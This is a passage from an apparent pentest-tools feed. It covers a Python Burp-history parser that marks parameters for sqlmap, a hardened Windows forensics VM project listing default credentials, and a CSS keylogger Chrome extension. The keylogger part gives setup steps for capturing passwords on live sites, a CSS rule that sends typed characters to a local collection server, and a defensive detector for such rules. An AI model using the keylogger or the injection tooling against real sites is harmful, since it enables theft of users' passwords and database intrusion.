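SQL_NAME = re.compile(r"^(?:sql|query|select|where|order(?:by)?|sort|column|table|from)$|_(?:sql|query|where|order)$", re.I)
SQL_VALUE = re.compile(r"\b(?:select|from|where|union|insert|update|delete|join)\b|\border\s+by\b", re.I)

def split_request(raw):
    """Split a raw HTTP request into (method, path, lower-cased headers, body)."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    method, path, _ = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        key, _, val = line.partition(":")
        headers[key.strip().lower()] = val.strip()
    return method, path, headers, body

def _pairs(where, encoded):
    """Decode name=value pairs, keeping the encoded pair so it can be marked in place later."""
    out = []
    for pair in filter(None, encoded.split("&")):
        name, _, val = pair.partition("=")
        out.append({"where": where, "name": unquote_plus(name), "value": unquote_plus(val), "raw": pair})
    return out

def extract_params(path, headers, body):
    """Parameters from the query string plus the three supported body content-types."""
    params = _pairs("query", urlsplit(path).query)
    ctype = headers.get("content-type", "")
    if ctype.startswith("application/x-www-form-urlencoded"):
        params += _pairs("form", body)
    elif ctype.startswith("application/json"):
        try:
            data = json.loads(body)
        except ValueError:
            data = {}
        # Top-level string members only; nested encodings are not descended, as the post notes.
        params += [{"where": "json", "name": k, "value": v, "raw": None}
                   for k, v in (data.items() if isinstance(data, dict) else []) if isinstance(v, str)]
    elif ctype.startswith("multipart/form-data"):
        for m in re.finditer(r'name="([^"]+)"\r\n\r\n(.*?)\r\n--', body, re.S):
            params.append({"where": "multipart", "name": m.group(1), "value": m.group(2), "raw": None})
    return params

def sql_like(param):
    """A parameter is interesting if its name or its decoded value looks like SQL."""
    return bool(SQL_NAME.search(param["name"]) or SQL_VALUE.search(param["value"]))

def mark_for_sqlmap(raw, flagged):
    """Append sqlmap's '*' marker to each flagged value inside the raw request text."""
    for p in flagged:
        if p["raw"] is not None:  # query string or form body: mark the encoded pair
            raw = raw.replace(p["raw"], p["raw"] + "*", 1)
        elif p["where"] == "json":
            raw = raw.replace(json.dumps(p["value"]), json.dumps(p["value"] + "*"), 1)
        else:  # multipart part body
            raw = raw.replace("\r\n\r\n" + p["value"] + "\r\n", "\r\n\r\n" + p["value"] + "*\r\n", 1)
    return raw

def analyze(xml_text, domains):
    """Walk a Burp history export; return one record per in-scope request with SQL-like parameters."""
    results = []
    for item in ET.fromstring(xml_text).iter("item"):
        host = item.findtext("host", "")
        if host not in domains:
            continue
        node = item.find("request")
        raw = node.text or ""
        if node.get("base64") == "true":
            raw = base64.b64decode(raw).decode("latin-1")
        method, path, headers, body = split_request(raw)
        flagged = [p for p in extract_params(path, headers, body) if sql_like(p)]
        if flagged:
            results.append({"host": host, "method": method, "path": path,
                            "flagged": flagged, "marked": mark_for_sqlmap(raw, flagged)})
    return results

# Constructed sample in the shape of Burp's "Save Items" export (base64-encoded requests).
_REQS = [
    ("example.com", "GET /search?q=select+name+from+users&page=2 HTTP/1.1\r\nHost: example.com\r\n\r\n"),
    ("example.com", 'POST /api/report HTTP/1.1\r\nHost: example.com\r\nContent-Type: application/json\r\n\r\n{"orderby": "created_at", "title": "Q1"}'),
    ("other.test", "POST /list HTTP/1.1\r\nHost: other.test\r\nContent-Type: application/x-www-form-urlencoded\r\n\r\nsort=name&limit=10"),
    ("example.com", 'POST /export HTTP/1.1\r\nHost: example.com\r\nContent-Type: multipart/form-data; boundary=XX\r\n\r\n--XX\r\nContent-Disposition: form-data; name="filter"\r\n\r\nstatus=open ORDER BY id\r\n--XX--\r\n'),
]
SAMPLE_XML = "<items>" + "".join(
    '<item><host>%s</host><request base64="true"><![CDATA[%s]]></request></item>'
    % (host, base64.b64encode(req.encode()).decode()) for host, req in _REQS) + "</items>"

if __name__ == "__main__":
    for r in analyze(SAMPLE_XML, ["example.com"]):
        print(r["method"], r["path"], [p["name"] for p in r["flagged"]])
```

Each record's "marked" string is the raw request with the markers inserted, which is what SleuthQL writes to its per-domain output directory; restricting analyze() to the domains in scope keeps third-party hosts captured by the proxy out of the result set.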

Link: http://feedproxy.google.com/~r/PentestTools/~3/GQ5nGSUgmaI/sleuthql-burp-history-parsing-tool-to.html

DARKSURGEON – A Windows Packer Project To Empower Incident Response, Digital Forensics, Malware Analysis, And Network Defense

DARKSURGEON is a Windows packer project to empower incident response, digital forensics, malware analysis, and network defense.

DARKSURGEON has three stated goals:

Accelerate incident response, digital forensics, malware analysis, and network defense with a preconfigured Windows 10 environment complete with tools, scripts, and utilities.
Provide a framework for defenders to customize and deploy their own programmatically-built Windows images using Packer and Vagrant.
Reduce the amount of latent telemetry collection, minimize error reporting, and provide reasonable privacy and hardening standards for Windows 10.

If you haven’t worked with packer before, this project has a simple premise: provide all the tools you need to have a productive, secure, and private Windows virtual machine so you can spend less time tweaking your environment and more time fighting bad guys.

Please note this is an alpha project and it will be subject to continual development, updates, and package breakage.

Development Principles

DARKSURGEON is based on a few key development principles:

Modularity is key. Each component of the installation and configuration process should be modular. This allows individuals to tailor their packer image in the most flexible way.
Builds must be atomic. A packer build should either complete all configuration and installation tasks without errors, or it should fail. A packer image with missing tools is a failure scenario.
Hardened out of the box. To the extent that it will not interfere with investigative workflows, all settings related to proactive hardening and security controls should be enabled. Further information on DARKSURGEON security can be found later in this post.
Instrumented out of the box. To the extent that it will not interfere with investigative workflows, Microsoft Sysmon, Windows Event Logging, and osquery will provide detailed telemetry on host behavior without further configuration.
Private out of the box. To the extent that it will not interfere with investigative workflows, all settings related to privacy, Windows telemetry, and error reporting should minimize collection.

Hardening

DARKSURGEON is hardened out of the box, and comes with scripts to enable High or Low security modes.

All default installations of DARKSURGEON have the following security features enabled:

Windows Secure Boot is Enabled.
Windows Event Log Auditing is Enabled. (Palantir Windows Event Forwarding Guidance)
Windows Powershell Auditing is Enabled. (Palantir Windows Event Forwarding Guidance)
Windows 10 Privacy and Telemetry are Reduced to Minimal Settings. (Microsoft Guidance)
Sysinternals Sysmon is Installed and Configured. (SwiftonSecurity Public Ruleset)
LLMNR is Disabled.
NBT is Disabled.
WPAD is Removed.
Powershell v2 is Removed.
SMB v1 is Removed.
Application handlers for commonly-abused file extensions are changed to notepad.exe.

Additionally, the user may specify a Low or High security mode by using the appropriate scripts. The default setting is to build an image in Low Security mode.

Low Security mode is primarily used for virtual machines intended for reverse engineering, malware analysis, or systems that cannot support VBS security controls. In Low Security mode, the following hardening features are configured:

Windows Defender Anti-Virus Real-Time Scanning is Disabled.
Windows Defender SmartScreen is Disabled.
Windows Defender Credential Guard is Disabled.
Windows Defender Exploit Guard is Disabled.
Windows Defender Exploit Guard Attack Surface Reduction (ASR) is Disabled.
Windows Defender Application Guard is Disabled.
Windows Defender Application Guard does not enforce isolation.

Note: High Security mode is still in development.

High Security mode is primarily used for production deployment of sensitive systems (e.g. Privileged Access Workstations) and may require additional tailoring or configuration. In High Security mode, the following hardening features are configured:

Windows Defender Anti-Virus Real-Time Scanning is Enabled.
Windows Defender SmartScreen is Enabled and applied to All Traffic.
Windows Defender Credential Guard is Enabled.
Windows Defender Exploit Guard is Enabled.
Windows Defender Exploit Guard Attack Surface Reduction (ASR) is Enabled.
Windows Defender Application Guard is Enabled.
Windows Defender Application Guard enforces isolation.

Telemetry

Whether analyzing unknown binaries or working on sensitive projects, endpoint telemetry powers detection and response operations. DARKSURGEON comes pre-configured with the following telemetry sources available for analysis:

Windows Event Log Auditing is enabled. (Palantir Windows Event Forwarding Guidance)
Windows Powershell Auditing is enabled. (Palantir Windows Event Forwarding Guidance)
Sysinternals Sysmon is installed and configured. (SwiftonSecurity Ruleset)

Privacy

Your operational environment contains some of the most sensitive data from your network, and it’s important to safeguard that from prying eyes. DARKSURGEON implements the following strategies to maximize privacy without hindering workflows:

Windows 10 telemetry settings are configured to minimize collection.
Cortana, diagnostics, tracking, and other services are disabled.
Windows Error Reporting (WER) is disabled.
Windows Timeline, shared clipboard, device hand-off, and other synchronize-by-default applications are disabled or neutered.
Microsoft Guidance for reducing telemetry and data collection has been implemented.

Packages

Out of the box, DARKSURGEON comes equipped with tools, scripts, and binaries to make your life as a defender easier.

Android Analysis (tools, scripts, and binaries focused on android analysis and reverse engineering): APKTool (FLARE)

Blue Team (tools, scripts, and binaries focused on blue team, network defense, and alerting/detection development): ACE, Bloodhound / Sharphound, CimSweep, Dumpsterfire, EndGame Red Team Automation (RTA), Kansa, Posh-Git, Invoke-ATTACKAPI, LOLBAS (Living Off the Land Binaries And Scripts), OSX Collector, Posh-SecMod, Posh-Sysmon, PowerForensics, PowerSploit, Practical Malware Analysis Labs (FLARE), Revoke-Obfuscation, Yara (FLARE)

Debuggers (tools, scripts, and binaries for debugging binary artifacts): Ollydbg (FLARE), OllyDump (FLARE), OllyDumpEx (FLARE), Ollydbg2 (FLARE), OllyDump2Ex (FLARE), x64dbg (FLARE), Windbg (FLARE)

Disassemblers (tools, scripts, and binaries for disassembling binary artifacts): IDA Free Trial (FLARE), Binary Ninja Demo (FLARE), Radare2 (FLARE)

Document Analysis (tools, scripts, and binaries for performing analysis of documents): OffVis (FLARE), OfficeMalScanner (FLARE), PDFId (FLARE), PDFParser (FLARE), PDFStreamDumper (FLARE)

DotNet Analysis (tools, scripts, and binaries for performing analysis of DotNet artifacts): DE4Dot (FLARE), DNSpy (FLARE), DotPeek (FLARE), ILSpy (FLARE)

Flash Analysis (tools, scripts, and binaries for performing analysis of flash artifacts): FFDec (FLARE)

Forensic Analysis (tools, scripts, and binaries for performing forensic analysis on application and operating system artifacts): Amcache Parser, AppCompatCache Parser, IISGeolocate, JLECmd, LECmd, JumpList Explorer, PECmd, Registry Explorer, Regshot (FLARE), Shellbags Explorer, Timeline Explorer, TSK (The Sleuthkit), Volatility, X-Ways Forensics Installer Manager (XWFIM)

Hex Editors: FileInsight (FLARE), HxD (FLARE), 010 Editor (FLARE)

Java Analysis: JD-GUI (FLARE), Dex2JAR

Network Analysis: Burp Free, FakeNet-NG (FLARE), Wireshark (FLARE)

PE Analysis: DIE (FLARE), EXEInfoPE (FLARE), Malware Analysis Pack (MAP) (FLARE), PEiD (FLARE), ExplorerSuite (CFF Explorer) (FLARE), PEStudio (FLARE), PEview (FLARE), Resource Hacker (FLARE), VirusTotal Uploader

Powershell Modules: Active Directory, Azure Management, Pester

Python Libraries: Cryptography, Hexdump, OLETools, LXML, Pandas, Passivetotal, PEFile, PyCryptodome, Scapy, Shodan, Sigma, Visual C++ for Python, Vivisect, WinAppDBG, Yara-Python

Red Team: Grouper, Inveigh, Nmap, Powershell Empire, PowerupSQL, PSAttack, PSAttack Build Tool, Responder

Remote Management: AWS Command Line (AWSCLI), OpenSSH, Putty, Remote Server Administration Tools (RSAT)

Utilities: 1Password, 7Zip, Adobe Flash Player, Adobe Reader, API Monitor, Bleachbit, Boxstarter, Bstrings, Checksum, Chocolatey, Cmder, Containers (Hyper-V), Curl, Cyber Chef, Docker, DotNet 3.5, DotNet 4, Exiftool, FLOSS (FLARE), Git, GoLang, Google Chrome, GPG4Win, Hashcalc, Hashdeep, Hasher, Hashtab, Hyper-V, Irfanview, Java JDK8, Java JRE8, JQ, Jupyter, Keepass, Microsoft Edge, Mozilla Firefox, Mozilla Thunderbird, Neo4j Community, NodeJS, Nuget, Office365 ProPlus, OpenVPN, Osquery, Python 2.7, Qbittorrent, RawCap, Slack, Sublime Text 3, Sysinternals Suite, Tor Browser, UnixUtils, UPX, Visual C++ 2005, Visual C++ 2008, Visual C++ 2010, Visual C++ 2012, Visual C++ 2013, Visual C++ 2015, Visual C++ 2017, Visual Studio Code, Windows 10 SDK, Windows Subsystem for Linux (WSL), Winlogbeat, XorSearch, XorStrings

Visual Basic Analysis: VBDecompiler

Building DARKSURGEON

Build Process

DARKSURGEON is built using the HashiCorp application packer. The total build time for a new instance of DARKSURGEON is around 2–3 hours.

Packer creates a new virtual machine using the DARKSURGEON JSON file and your hypervisor of choice (e.g. Hyper-V, Virtualbox, VMWare).
The answers.iso file is mounted inside the DARKSURGEON VM along with the Windows ISO. The answers.iso file contains the unattend.xml needed for a touchless installation of Windows, as well as a powershell script to configure Windows Remote Management (WinRM).
Packer connects to the DARKSURGEON VM using WinRM and copies all files in the helper-scripts and configuration-files directories over to the host.
Packer performs serial installations of each of the configured powershell scripts, performing occasional reboots as needed.
When complete, packer performs a sysprep, shuts down the virtual machine, and creates a vagrant box file. Additional outputs may be specified in the post-processors section of the JSON file.

Setup

Note: Hyper-V is currently the only supported hypervisor in this alpha release. VirtualBox and VMWare support are forthcoming.

Install packer, vagrant, and your preferred hypervisor on your host.
Download the repository contents to your host.
Download a Windows 10 Enterprise Evaluation ISO (1803).
Move the ISO file to your local DARKSURGEON repository.
Update DARKSURGEON.json with the ISO SHA1 hash and file name.
(Optional) Execute the powershell script New-DARKSURGEONISO.ps1 to generate a new answers.iso file. There is an answers ISO file included in the repository, but you may re-build it if you don’t trust it or would like to modify the unattend files:

powershell.exe New-DARKSURGEONISO.ps1

Build the recipe using packer:

packer build -only=[hyperv-iso|vmware|virtualbox] .\DARKSURGEON.json

Configuring DARKSURGEON

DARKSURGEON is designed to be modular and easy to configure. An example configuration is provided in the DARKSURGEON.json file, but you may add, remove, or tweak any of the underlying scripts.

Have a custom CA you need to add? Need to add a license file for IDA? No problem. You can throw any files you need in the configuration-files directory and they’ll be copied over to the host for you.

Want to install a custom package, or need some specific OS tweaks? No worries. Simply make a new powershell script (or modify an existing one) in the configuration-scripts directory and add it as a build step in the packer JSON file.

Using DARKSURGEON

Note: Hyper-V is currently the only supported hypervisor in this alpha release. VirtualBox and VMWare support are forthcoming.

Once DARKSURGEON has successfully built, you’ll receive an output vagrant box file. The box file contains the virtual machine image and vagrant metadata, allowing you to quickly spin up a virtual machine as needed.

Install vagrant and your preferred hypervisor on your host.
Navigate to the DARKSURGEON repository (or the location where you’ve saved the DARKSURGEON box file).
Perform a vagrant up:

vagrant up

Vagrant will now extract the virtual machine image from the box file, read the metadata, and create a new VM for you. Want to kill this VM and get a new one? Easy, just perform the following:

vagrant destroy && vagrant up

Once the DARKSURGEON virtual machine is running, you can login using one of the two local accounts.

Note: These are default accounts with default credentials. You may want to consider changing the credentials in your packer build.

Administrator Account: Username: Darksurgeon / Password: darksurgeon
Local User Account: Username: Unprivileged / Password: unprivileged

If you’d rather not use vagrant, you can either import the VM image manually, or look at one of the many other post-processor options provided by packer.

Downloading DARKSURGEON

If you’d rather skip the process of building DARKSURGEON and want to trust the box file I’ve built, you can simply download it here.

Contributing

Contributions, fixes, and improvements can be submitted directly against this project as a GitHub issue or pull request. Tools will be reviewed and added on a case-by-case basis.

Frequently Asked Questions

Why is Hyper-V the preferred hypervisor?

I strongly believe in the value of Windows Defender Device Guard and Virtualization Based Security, which require the usage of Hyper-V for optimal effectiveness. As a result, other hypervisors are not recommended on the host machine. I will do my best to accommodate other mainline hypervisors, but I would encourage all users to try using Hyper-V.

Why does the entire packer build fail on a chocolatey package error?

This was a design decision made to guarantee that all expected packages made it into the final packer build. The upside of this decision is that it guarantees all expected tools will be available in the finalized product. The downside is that additional complexity and fragility are inserted into the build pipeline, as transient or chocolatey errors may cause a build to fail. If you wish to ignore this functionality, you are free to modify the underlying script to ignore errors on package installation.

Does this project support using a Chocolatey Professional/Business/Consultant license?

Yes. If you add your license file (named chocolatey.license.xml) to the configuration-files directory when performing a packer build, it will automatically be imported by the Set-ChocolateySettings.ps1 script. Please ensure that your usage of a chocolatey license adheres to their End-User License Agreement.

Why are the build functions broken into dozens of individual powershell scripts?

Flexibility is key. You may opt to use — or not use — any of these scripts, and in any order. Having individual files, while increasing project complexity, ensures that the project can be completely customized without issue.

I want to debug the build. How do I do so?

Add the Set-Breakpoint.ps1 script into the provisioner process at the desired point. This will cause the packer build to halt for 4 hours as it waits for the script to complete.

Troubleshooting

The packer build process never starts and hangs on the UEFI screen.

This is most likely a timing issue caused by the emulated key presses not causing the image to boot from the mounted Windows ISO. Restart your VM and hit any button a few times until the build process starts.

Packer timed out during the build. I didn’t receive an error.

Due to the size of the packages that are downloaded and installed, you may have exceeded the default packer build time limit.

My VM is running, but packer doesn’t seem to connect via WinRM.

Connect to the guest and check the following:

WinRM is accessible from your packer host. (Test-NetConnection -ComputerName -Port 5985)
WinRM is allowed on the guest firewall.

I keep getting anti-virus, checksum, or other issues with Chocolatey. What gives?

Unfortunately these packages can be a moving target. New updates can render the static checksum in the chocolatey package incorrect, anti-virus may mistakenly flag binaries, etc. Global chocolatey options can be specified to prevent these errors from occurring, but I will do my best to respond to bug reports filed as issues on underlying chocolatey packages.

Download DARKSURGEON

Link: http://feedproxy.google.com/~r/PentestTools/~3/B8p_3LOKtq0/darksurgeon-windows-packer-project-to.html

CSS Keylogger – Chrome Extension And Express Server That Exploits Keylogging Abilities Of CSS

Chrome extension and Express server that exploits keylogging abilities of CSS.

To use

Setup Chrome extension

Download the repository: git clone https://github.com/maxchehab/CSS-Keylogging
Visit chrome://extensions in your browser (or open up the Chrome menu by clicking the icon to the far right of the Omnibox; the menu’s icon is three horizontal bars. Then select Extensions under the More Tools menu to get to the same place).
Ensure that the Developer mode checkbox in the top right-hand corner is checked.
Click Load unpacked extension… to pop up a file-selection dialog.
Select css-keylogger-extension in the directory to which you downloaded this repository.

Setup Express server

yarn
yarn start

Haxking l33t passw0rds

Open a website that uses a controlled component framework such as React, e.g. https://instagram.com.
Press the extension C on the top right of any webpage.
Type your password.
Your password should be captured by the express server.

How it works

This attack is really simple. Utilizing CSS attribute selectors, one can request resources from an external server under the premise of loading a background-image.

For example, the following CSS will select all inputs with a type that equals password and a value that ends with a. It will then try to load an image from http://localhost:3000/a.

input[type="password"][value$="a"] { background-image: url("http://localhost:3000/a"); }

Using a simple script one can create a CSS file that will send a custom request for every ASCII character.

Download CSS Keylogger
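A defender-side check for the pattern just described, added here as an example that is not part of the CSS-Keylogging repository: it parses a stylesheet into rules and flags every rule whose selector conditions on an input's value attribute and whose declarations fetch a remote URL, which is the combination that turns a stylesheet into a keystroke exfiltration channel. The sample stylesheet, the function names and the regular expressions are constructed for this example.

```javascript
// Added example, not code from the CSS-Keylogging project.
// Matches attribute selectors on `value`: [value$="a"], [value^=x], [value*='q'] ...
const VALUE_SELECTOR =
  /\[\s*value\s*(?:\$|\^|\*|~|\|)?=\s*(?:"[^"]*"|'[^']*'|[^\]\s]+)\s*\]/i;
// Matches url(...) pointing at an absolute or protocol-relative remote location.
const REMOTE_URL = /url\(\s*["']?\s*(?:https?:)?\/\//i;

// Split a flat stylesheet into { selector, declarations } pairs.
// Constructed helper: comments are stripped, nested @-rules are not handled.
function parseRules(css) {
  const rules = [];
  const stripped = css.replace(/\/\*[\s\S]*?\*\//g, "");
  const rule = /([^{}]+)\{([^{}]*)\}/g;
  let m;
  while ((m = rule.exec(stripped)) !== null) {
    rules.push({ selector: m[1].trim(), declarations: m[2].trim() });
  }
  return rules;
}

// Return the rules that both key on an input value and load a remote resource.
// A rule that keys on value but loads a same-origin path is not reported:
// it cannot leak to a third party, and a CSP such as `img-src 'self'` would
// block the remote variant as well. The selector only ever matches when the
// framework mirrors the live value into the DOM attribute, as React controlled
// components do, which is why the page above targets such sites.
function findValueExfilRules(css) {
  return parseRules(css).filter(
    (r) => VALUE_SELECTOR.test(r.selector) && REMOTE_URL.test(r.declarations)
  );
}

// Constructed sample stylesheet: a benign rule, one rule of the kind the
// extension injects (reusing the page's own localhost example), and a rule
// that keys on value but stays on the same origin.
const SAMPLE_CSS = `
/* theme */
input[type="password"] { border: 1px solid #ccc; }
input[type="password"][value$="a"] { background-image: url("http://localhost:3000/a"); }
input[value^="x"] { background-image: url("/static/dot.png"); }
`;

const suspicious = findValueExfilRules(SAMPLE_CSS);
for (const r of suspicious) {
  console.log(`suspicious rule: ${r.selector} -> ${r.declarations}`);
}
```

Running the block prints the single injected rule; the same scan can be pointed at any stylesheet text fetched from a page or bundled with an extension.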

Link: http://feedproxy.google.com/~r/PentestTools/~3/1jiciHQ1uSs/css-keylogger-chrome-extension-and.html